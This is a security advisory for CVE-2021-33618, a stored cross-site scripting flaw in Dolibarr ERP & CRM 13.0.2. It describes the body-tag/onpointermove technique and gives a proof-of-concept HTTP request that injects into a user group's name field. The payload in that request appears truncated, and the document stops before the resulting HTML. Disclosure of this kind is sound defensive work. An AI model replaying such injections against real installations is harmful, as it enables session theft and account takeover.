-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 # Trovent Security Advisory 2105-02 # ##################################### Stored cross-site scripting in Dolibarr ERP & CRM ################################################# Overview ######## Advisory ID: TRSA-2105-02 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2105-02 Affected product: Dolibarr ERP & CRM Tested versions: Dolibarr 13.0.2 Vendor: Dolibarr foundation, https://www.dolibarr.org Credits: Trovent Security GmbH, Nick Decker Detailed description #################### Trovent Security GmbH discovered that the Dolibarr application does not escape "greater than" and "smaller than" characters if they are reflected in one of the small pop-up windows with details of the object. This allows an attacker to add certain custom HTML tags and attributes. In our PoC we used a "body" tag in conjunction with an "onpointermove" attribute to achieve constant execution of the inserted JavaScript code. Severity: Critical CVSS Score: 9.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H) CWE ID: CWE-79 CVE ID: CVE-2021-33618 Proof of concept ################ This is the HTTP request to change the group name: REQUEST: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ POST /user/group/card.php HTTP/1.1 Host: 10.11.9.80 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 -securitytest-for-dolibarr Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------329097076628264922392755475836 Content-Length: 950 Origin: http://10.11.9.80 Connection: close Referer: http://10.11.9.80/user/group/card.php?id=1&action=edit&token=4726524fe505b027519a535e08c11fb6 Cookie: PHPSESSID=8s2jl8fhmbm5th8r4baasak1q2; DOLSESSID_736206a821984837877b8a6a901910d2=4jkf7smp24evfm3vvnnunj8jaq Upgrade-Insecure-Requests: 1 - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="token" 6585d0838337cafddc3387fcccbe9d91 - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="action" update - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="backtopage" /user/group/card.php?id=1 - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="id" 1 - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="nom" Trovent<
test - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="note" - -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="save" Save - -----------------------------329097076628264922392755475836-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CODE: The HTML code of the site then includes the attribute in its body tag: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~